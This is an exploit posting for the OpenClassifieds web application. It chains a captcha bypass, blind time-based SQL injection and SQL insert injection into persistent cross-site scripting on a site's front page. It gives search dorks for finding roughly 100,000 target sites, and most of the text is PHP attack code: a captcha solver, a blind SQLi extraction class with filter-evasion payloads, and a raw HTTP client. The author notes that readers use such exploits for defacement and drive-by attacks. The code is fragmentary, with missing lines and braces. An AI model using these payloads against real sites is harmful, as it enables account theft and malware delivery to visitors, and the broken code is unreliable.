OpenClassifieds - Chained: Captcha Bypass / SQL Injection / Persistent Cross-Site Scripting on FrontPage









Author:Michael Brooks (Rook)<br>
Exploit chain:captcha bypass->sqli(insert)->persistant xss on front page<br>
If registration is required an extra link in the chain is added:<br>
Exploit chain:blind sqli(select)->captcha
bypass->sqli(insert)->persistant xss on front page<br>
sites with SEO url's enabled:<br>
"powerd by Open Classifieds" inurl:"publish-a-new-ad.htm"  (85,000 results)<br>
or default urls:<br>
"powerd by Open Classifieds"  inurl:"item-new.php" (16,500 results)<br>
Total sites: ~100,000<br>
The target must be a link to the document root of OpenClassifieds<br>
(If the exploit doesn't immediately reload then blind sqli is
required,  which will take a few minutes  ;)<br>
	Target:  <input size=128 name=target value="http://localhost/"><br>
	Payload:<input size=128 name=xss value="<script>alert('xss')</script>"><br>
	<input type=submit value="Attack">
 I have always wanted to write a chained exploit with a captcha
bypass,  so I couldn't miss this
 opportunity.    I spent a bit more effort on this exploit even though
there aren't very many hits (around
 100k starts to be worth while). Regardless, I dug into the
application and pulled out the vulnerabilities
 needed to Finnish my masterpiece.  Usually when I write a Remote Code
Execution exploit for a web
 app you guys just deface the site or throw up drive-by attacks.  So I
figured, persistent XSS on the
 front page is equally as valuable,  especially with yet another IE
0-day in the wild.  The chain is within
 the application its self.  Process sand-boxing like
 doesn't come into play.  It works regardless of the operating system
or configurations (Suhosin,
 safemode, magic_quotes_gpc and register_globals doesn't come into
play). I focused on the
 application's internal configurations that could break the
exploitation process.  In this case seo friendly
 urls and requiring an account before posting.

 "This web application [OpenClassifieds] is developed to be fast,
light, secure and SEO friendly."
 Usually when I see that an application claims to be secure,  they
really don't know what the fuck they
 are doing.  OpenClassifieds' Security model is deeply flawed and as a
result there are MANY
 vulnerabilities in this code base which allowed me to string a few
cool ones together to make an
 interesting exploit.    OpenClassifieds is sanitizing everything on
input using cG() and cP(),  these
 functions are used to perform a mysql_real_escape_string()  on all
GET and POST variables.  Most
 servers aren't using an exotic character set so from a security stand
point this is exactly identical to
 magic_quotes_gpc.  So I dusted off my usual magic_quotes_gpc auditing
tricks,  look for
 stripslashes(),base64decode(),urldecode(),html_entity_decode() lack
of quote marks around variables
 in a query,  ect...  Sanitation must ALWAYS be done at the time of
use, parametrized queries are a
 good example of this.   Its impossible to account for all the ways a
variable can be mangled once it
 enters a program and if you Sanitize input when it first enters the
program there will be cases where it
 will become dangerous again.   This isn't only a problem for SQLi,
its also a problem for XSS.  I am
 inserting JS into the database, which isn't a vulnerablity,  but
printing it, is persistant XSS.

 The blind sql injection is a bit strange.  I can't use white space or
commas,  which is a pain.  I had to
 rewrite my general purpose Blind SQLi Class to accommodate.   A
binary search is used to greatly
 speed up the blind sqli attack.
 (which I also used in my php-nuke exploit:

 Special thanks to Reiners for this sqli filter evasion cheat sheet:
 Here are some changes I had to make to my blind sql injection class:
 "select substring('abc',1,1)"=>"select substring('abc' from 1 for 1)"
=>"case ".sprintf($question,"0+".$cur).">".$pos." when true  then
sleep(".$this->timeout.") end"

 CWE Violations leveraged by this exploit:
 CWE-256: Plaintext Storage of a Password
 CWE-804: Guessable CAPTCHA  (I asked that they create this CWE when I
ran into a guy that works for Mitre.)
 CWE-89: SQL Injection x2
 CWE-79: Cross-site Scripting (Persistant)
Vulnerable captcha:
openclassifieds/includes/common.php line 291
function encode_str ($input){//converts the input into Ascii HTML, to
ofuscate a bit
    for ($i = 0; $i < strlen($input); $i++) {
         $output .= "&#".ord($input[$i]).';';
    //$output = htmlspecialchars($output);//uncomment to escape sepecial chars
    return $output;
function mathCaptcha(){//generates a captcha for the form
	$first_number=mt_rand(1, 94);//first operation number
	$second_number=mt_rand(1, 5);//second operation number

	$_SESSION["mathCaptcha"]=($first_number+$second_number);//operation result

	$operation=" <b>".encode_str($first_number ." + ".
$second_number)."</b>?";//operation codifieds

	echo _("How much is")." ".$operation;
Vulnerable persistant xss and sqli
/content/item-new.php line 41

function main(){
	if($_REQUEST['target'] && $_REQUEST['xss']){
			print("<b>Persistant XSS attack was sucessful.</b>");
			print("<b>Persistant XSS attack has failed.</b>");

//w00t, I can crack your captcha with 4 lines of code!
//It would have been 3 if i had used eval(),  but that would be a
vulnerability ;)
function breakCaptcha($page){
	$math=new EvalMath();
	return $math->evaluate($code);

function xssFrontPage($url,$xss){
	$h=new http_client();
	#Authentication required.
	if(strstr($page,'Location: http')){#Do we need authentication?
		print "Blind SQL Injection required.<br>";
		$sex=new openclassifieds_blind_sql_injection($url."/");
			print "Target is vulnerable to attack!<br>";
			print "Found Password:<b>$pass</b><br>";
			print "Found email:<b>$email</b><br>";
			die("This target is not exploitable!<br>");
	$pwd=mt_rand(1,9999999);//Strong password :p
	//Stored xss in the description,place and name columns.
	//I could use sql injection to find the id,  but thats noisy and slow.
	//seo friendly
	}else if(preg_match("/item\=(.*)\&type/",$rss,$match)){
	#Now lets activate the XSS post.
		$test=strstr($page,"<script language='JavaScript'
	return $test;

//The blind_sql_injeciton calss is a general exploit framework that we
are inheriting.
class openclassifieds_blind_sql_injection extends blind_sql_injection {
    //This is the blind sql injection request.
    function query($check){
        //build the http request to Inject a query:
	//"%26%23039;" is a single quote encoded with
	$payload="%26%23039; or (select ".$check." from oc_accounts where
active=1 limit 1) or 1=%26%23039;";
	#white space becomes and underscore "_" so it must be replaced.
	$payload=str_replace(" ","/**/",$payload);

//This is a very efficient blind sql injection class.
class blind_sql_injection{
    var $url, $backup_url, $result, $http, $request_count, $timeout;
    function blind_sql_injection($url,$timeout=10){
        $this->http=new http_client();
    function set_get($get){
    function set_referer($referer){
    function set_post($post){
    function test_target(){
        return $this->send("case true when true then
sleep(".$this->timeout.") when false then sleep(0)
end")&&!$this->send("case false when true then
sleep(".$this->timeout.") when false then sleep(0) end");
	#return $this->send("if(true,sleep(".$this->timeout."),0)")&&!$this->send("if(false,sleep(".$this->timeout."),0)");
    function num_to_hex($arr){
        foreach($arr as $a){
        return $ret;
    ###These where not ported to the non-comma version.
    //Looking for a string of length 32 and base 16 in ascii chars.
    #function find_md5($column){
     #   return
    #function find_sha1($column){
     #   return
    //Look for an ascii string of arbitrary length.
    function find_string($column){
        //A length of zero means we are looking for a null byte
terminated string.
        $result=$this->bin_finder(128,0,"ascii(substring($column from
%s for 1))");
        foreach($result as $r){
        return strrev($ret);
    //query() is a method that generates the sql injection request
    function query($check){
        //This function must be overridden.
    function recheck($result,$question,$base){
       //Force a long timeout.
       foreach($result as $r){
    function linear_finder($base,$length,$question){

    #Binary search for mysql based sql injection.
    function bin_finder($base,$length,$question){
            $pos= $low+(($high-$low)/2);
                #asking the sql database if the current value is
greater than $pos
".sprintf($question,"0+".$cur).">".$pos." when true  then
sleep(".$this->timeout.") end")){
                    #if this is true then the value must be the modulus.
                #asking the sql database if the current value is less than $pos
                }else if($this->send("case
".sprintf($question,"0+".$cur)."<".$pos." when true then
sleep(".$this->timeout.") end")){
		#}else if($this->send("if(least(".sprintf($question,$cur).",".$pos.")!=".$pos.",sleep(".$this->timeout."),0)")){
                   #if this is true the value must be zero, or in the
case of ascii,  a null byte.
                        #We have found the null terminator so we have
finnished our search for a string.
                    #both greater than and less then where asked, so
so then the answer is our guess $pos.
        return $result;
    //Fire off the request
    function send($quesiton){
        //build the injected query.
        //backup_url is for set_get()
        return (time()-$start>=$this->timeout);
    //retroGod RIP
   function charEncode($string){
	return $char;

//General purpose http client that works on a default php install.
(curl not required)
class http_client{
    var $proxy_ip='', $proxy_port='', $proxy_name='', $proxy_pass='',
    function send($loc){
         //overload function polymorphism between gets and posts
            $fp = pfsockopen( $this->proxy_ip, $this->proxy_port,
&$errno, &$errstr, 120 );
            $fp = fsockopen( $url['host'], $url['port'], &$errno,
&$errstr, 120 );
         if( !$fp ) {
            print "$errstr ($errno)<br>\nn";
            return false;
         } else {
            if( $this->postdata=='' ) {
                $request="GET ".$url['path']."?".$url['query']." HTTP/1.1\r\n";
            } else {
                $request="POST ".$url['path']."?".$url['query']." HTTP/1.1\r\n";
                $request.="Proxy-Authorization: Basic
            $request.="Host: ".$url['host'].":".$url['port']."\r\n";
            $request.="User-Agent: ".$ua."\r\n";
            $request.="Accept: text/plain\r\n";
                $request.="Referer: ".$this->referer."\r\n";
            $request.="Connection: Close\r\n";
                $request.="Cookie: ".$this->cookie."\r\n" ;
            if( $this->postdata!='' ) {
                $strlength = strlen( $this->postdata );
application/x-www-form-urlencoded\r\n" ;
                $request.="Content-length: ".$strlength."\r\n\r\n";
            fputs( $fp, $request."\r\n\r\n" );
	    while( !feof( $fp ) ) {
                   $output .= fgets( $fp, 1024 );
            fclose( $fp );
	    if(strstr($header[0],"Set-Cookie: ") && $this->cookie==''){
		$cookie=explode("Set-Cookie: ",$header[0]);
	    return $output;
    //Use a http proxy
    function proxy($proxy){ //user:pass@ip:port
    //Parses the results from a PHP error to use as a path disclosure.
    function getPath($url,$pops=1){
        //Regular error reporting:
        $resp=explode("array given in <b>",$html);
            $resp = explode("</b>",$resp[1]);
            //xdebug's error reporting:
            $resp=explode("array given in ",$html);
                $resp = explode(" ",$resp[1]);
        //Can't use dirname()
        return $path;
    //Grab the server type from the http header.
    function getServer($url){
        $header=explode("Server: ",$resp);
        return $server[0];

#used to evaluate the captcha. 1+2=3
 class EvalMath {

                var $suppress_errors = false;
                var $last_error = null;

                var $v = array('e'=>2.71,'pi'=>3.14); // variables
(and constants)
                var $f = array(); // user-defined functions
                var $vb = array('e', 'pi'); // constants
                var $fb = array(  // built-in functions

                function EvalMath() {
                        // make the variables a little more accurate
                        $this->v['pi'] = pi();
                        $this->v['e'] = exp(1);

                function e($expr) {
                        return $this->evaluate($expr);

                function evaluate($expr) {
                        $this->last_error = null;
                        $expr = trim($expr);
                        if (substr($expr, -1, 1) == ';') $expr =
substr($expr, 0, strlen($expr)-1); // strip semicolons at the end
                        // is it a variable assignment?
                        if (preg_match('/^\s*([a-z]\w*)\s*=\s*(.+)$/',
$expr, $matches)) {
                                if (in_array($matches[1], $this->vb))
{ // make sure we're not assigning to a constant
                                        return $this->trigger("cannot
assign to constant '$matches[1]'");
                                if (($tmp =
$this->pfx($this->nfx($matches[2]))) === false) return false; // get
the result and make sure it's good
                                $this->v[$matches[1]] = $tmp; // if
so, stick it in the variable array
                                return $this->v[$matches[1]]; // and
return the resulting value
                        // is it a function assignment?
                        } elseif
$expr, $matches)) {
                                $fnn = $matches[1]; // get the function name
                                if (in_array($matches[1], $this->fb))
{ // make sure it isn't built in
                                        return $this->trigger("cannot
redefine built-in function '$matches[1]()'");
                                $args = explode(",",
preg_replace("/\s+/", "", $matches[2])); // get the arguments
                                if (($stack = $this->nfx($matches[3]))
=== false) return false; // see if it can be converted to postfix
                                for ($i = 0; $i<count($stack); $i++) {
// freeze the state of the non-argument variables
                                        $token = $stack[$i];
                                        if (preg_match('/^[a-z]\w*$/',
$token) and !in_array($token, $args)) {
(array_key_exists($token, $this->v)) {
                                                        $stack[$i] =
                                                } else {
$this->trigger("undefined variable '$token' in function definition");
                                $this->f[$fnn] = array('args'=>$args,
                                return true;
                        } else {
                                return $this->pfx($this->nfx($expr));
// straight up evaluation, woo

                function vars() {
                        $output = $this->v;
                        return $output;

                function funcs() {
                        $output = array();
                        foreach ($this->f as $fnn=>$dat)
                                $output[] = $fnn . '(' . implode(',',
$dat['args']) . ')';
                        return $output;

                //===================== HERE BE INTERNAL METHODS

                // Convert infix to postfix notation
                function nfx($expr) {

                        $index = 0;
                        $stack = new EvalMathStack;
                        $output = array(); // postfix form of
expression, to be passed to pfx()
                        $expr = trim(strtolower($expr));

                        $ops   = array('+', '-', '*', '/', '^', '_');
                        $ops_r =
array('+'=>0,'-'=>0,'*'=>0,'/'=>0,'^'=>1); // right-associative
                        $ops_p =
array('+'=>0,'-'=>0,'*'=>1,'/'=>1,'_'=>1,'^'=>2); // operator

                        $expecting_op = false; // we use this in
syntax-checking the expression
and determining when a - is a negation

                        if (preg_match("/[^\w\s+*^\/()\.,-]/", $expr,
$matches)) { // make sure the characters are all good
                                return $this->trigger("illegal
character '{$matches[0]}'");

                        while(1) { // 1 Infinite Loop ;)
                                $op = substr($expr, $index, 1); // get
the first character at the current index
                                // find out if we're currently at the
beginning of a number/variable/function/parenthesis/operand
                                $ex =
preg_match('/^([a-z]\w*\(?|\d+(?:\.\d*)?|\.\d+|\()/', substr($expr,
$index), $match);
                                if ($op == '-' and !$expecting_op) {
// is it a negation instead of a minus?
                                        $stack->push('_'); // put a
negation on the stack
                                } elseif ($op == '_') { // we have to
explicitly deny this, because it's legal on the stack
                                        return $this->trigger("illegal
character '_'"); // but not in the input expression
                                } elseif ((in_array($op, $ops) or $ex)
and $expecting_op) { // are we putting an operator on the stack?
                                        if ($ex) { // are we expecting
an operator but have a number/variable/function/opening parethesis?
                                                $op = '*'; $index--;
// it's an implicit multiplication
                                        // heart of the algorithm:
                                        while($stack->count > 0 and
($o2 = $stack->last()) and in_array($o2, $ops) and ($ops_r[$op] ?
$ops_p[$op] < $ops_p[$o2] : $ops_p[$op] <= $ops_p[$o2])) {
                                                $output[] =
$stack->pop(); // pop stuff off the stack into the output
                                        // many thanks:
                                        $stack->push($op); // finally
put OUR operator onto the stack
                                        $expecting_op = false;
                                } elseif ($op == ')' and
$expecting_op) { // ready to close a parenthesis?
                                        while (($o2 = $stack->pop())
!= '(') { // pop off the stack back to the last (
                                                if (is_null($o2))
return $this->trigger("unexpected ')'");
                                                else $output[] = $o2;
(preg_match("/^([a-z]\w*)\($/", $stack->last(2), $matches)) { // did
we just close a function?
                                                $fnn = $matches[1]; //
get the function name
                                                $arg_count =
$stack->pop(); // see how many arguments there were (cleverly stored
on the stack, thank you)
                                                $output[] =
$stack->pop(); // pop the function and push onto the output
                                                if (in_array($fnn,
$this->fb)) { // check the argument count
                                                        if($arg_count > 1)
$this->trigger("too many arguments ($arg_count given, 1 expected)");
                                                } elseif
(array_key_exists($fnn, $this->f)) {
                                                        if ($arg_count
!= count($this->f[$fnn]['args']))
$this->trigger("wrong number of arguments ($arg_count given, " .
count($this->f[$fnn]['args']) . " expected)");
                                                } else { // did we
somehow push a non-function on the stack? this should never happen
$this->trigger("internal error");
                                } elseif ($op == ',' and
$expecting_op) { // did we just finish a function argument?
                                        while (($o2 = $stack->pop()) != '(') {
                                                if (is_null($o2))
return $this->trigger("unexpected ','"); // oops, never had a (
                                                else $output[] = $o2;
// pop the argument expression stuff and push onto the output
                                        // make sure there was a function
(!preg_match("/^([a-z]\w*)\($/", $stack->last(2), $matches))
$this->trigger("unexpected ','");
// increment the argument count
                                        $stack->push('('); // put the
( back on, we'll need to pop back to it again
                                        $expecting_op = false;
                                } elseif ($op == '(' and !$expecting_op) {
                                        $stack->push('('); // that was easy
                                        $allow_neg = true;
                                } elseif ($ex and !$expecting_op) { //
do we now have a function/variable/number?
                                        $expecting_op = true;
                                        $val = $match[1];
(preg_match("/^([a-z]\w*)\($/", $val, $matches)) { // may be func, or
variable w/ implicit multiplication against parentheses...
(in_array($matches[1], $this->fb) or array_key_exists($matches[1],
$this->f)) { // it's a func
                                                        $expecting_op = false;
                                                } else { // it's a var
w/ implicit multiplication
                                                        $val = $matches[1];
                                                        $output[] = $val;
                                        } else { // it's a plain old var or num
                                                $output[] = $val;
                                        $index += strlen($val);
                                } elseif ($op == ')') { //
miscellaneous error checking
                                        return $this->trigger("unexpected ')'");
                                } elseif (in_array($op, $ops) and
!$expecting_op) {
$this->trigger("unexpected operator '$op'");
                                } else { // I don't even want to know
what you did to get here
                                        return $this->trigger("an
unexpected error occured");
                                if ($index == strlen($expr)) {
                                        if (in_array($op, $ops)) { //
did we end with an operator? bad.
$this->trigger("operator '$op' lacks operand");
                                        } else {
                                while (substr($expr, $index, 1) == '
') { // step the index past whitespace (pretty much turns whitespace
       // into implicit multiplication if no operator is there)

                        while (!is_null($op = $stack->pop())) { // pop
everything off the stack and push onto output
                                if ($op == '(') return
$this->trigger("expecting ')'"); // if there are (s on the stack, ()s
were unbalanced
                                $output[] = $op;
                        return $output;

                // evaluate postfix notation
                function pfx($tokens, $vars = array()) {

                        if ($tokens == false) return false;

                        $stack = new EvalMathStack;

                        foreach ($tokens as $token) { // nice and easy
                                // if the token is a binary operator,
pop two values off the stack, do the operation, and push the result
back on
                                if (in_array($token, array('+', '-',
'*', '/', '^'))) {
                                        if (is_null($op2 =
$stack->pop())) return $this->trigger("internal error");
                                        if (is_null($op1 =
$stack->pop())) return $this->trigger("internal error");
                                        switch ($token) {
                                                case '+':

$stack->push($op1+$op2); break;
                                                case '-':

$stack->push($op1-$op2); break;
                                                case '*':

$stack->push($op1*$op2); break;
                                                case '/':
                                                        if ($op2 == 0)
return $this->trigger("division by zero");

$stack->push($op1/$op2); break;
                                                case '^':

$stack->push(pow($op1, $op2)); break;
                                // if the token is a unary operator,
pop one value off the stack, do the operation, and push it back on
                                } elseif ($token == "_") {
                                // if the token is a function, pop
arguments off the stack, hand them to the function, and push the
result back on
                                } elseif
(preg_match("/^([a-z]\w*)\($/", $token, $matches)) { // it's a
                                        $fnn = $matches[1];
                                        if (in_array($fnn, $this->fb))
{ // built-in function:
                                                if (is_null($op1 =
$stack->pop())) return $this->trigger("internal error");
                                                $fnn =
preg_replace("/^arc/", "a", $fnn); // for the 'arc' trig synonyms
                                                if ($fnn == 'ln') $fnn = 'log';
                                                eval('$stack->push(' .
$fnn . '($op1));'); // perfectly safe eval()
                                        } elseif
(array_key_exists($fnn, $this->f)) { // user function
                                                // get args
                                                $args = array();
                                                for ($i =
count($this->f[$fnn]['args'])-1; $i >= 0; $i--) {
(is_null($args[$this->f[$fnn]['args'][$i]] = $stack->pop())) return
$this->trigger("internal error");

$stack->push($this->pfx($this->f[$fnn]['func'], $args)); // yay...
                                // if the token is a number or
variable, push it on the stack
                                } else {
                                        if (is_numeric($token)) {
                                        } elseif
(array_key_exists($token, $this->v)) {
                                        } elseif
(array_key_exists($token, $vars)) {
                                        } else {
$this->trigger("undefined variable '$token'");
                        // when we're out of tokens, the stack should
have a single element, the final result
                        if ($stack->count != 1) return
$this->trigger("internal error");
                        return $stack->pop();

                // trigger an error, but nicely, if need be
                function trigger($msg) {
                        $this->last_error = $msg;
                        if (!$this->suppress_errors)
trigger_error($msg, E_USER_WARNING);
                        return false;

        // for internal use
        class EvalMathStack {

                var $stack = array();
                var $count = 0;

                function push($val) {
                        $this->stack[$this->count] = $val;

                function pop() {
                        if ($this->count > 0) {
                                return $this->stack[$this->count];
                        return null;

                function last($n=1) {
                        return $this->stack[$this->count-$n];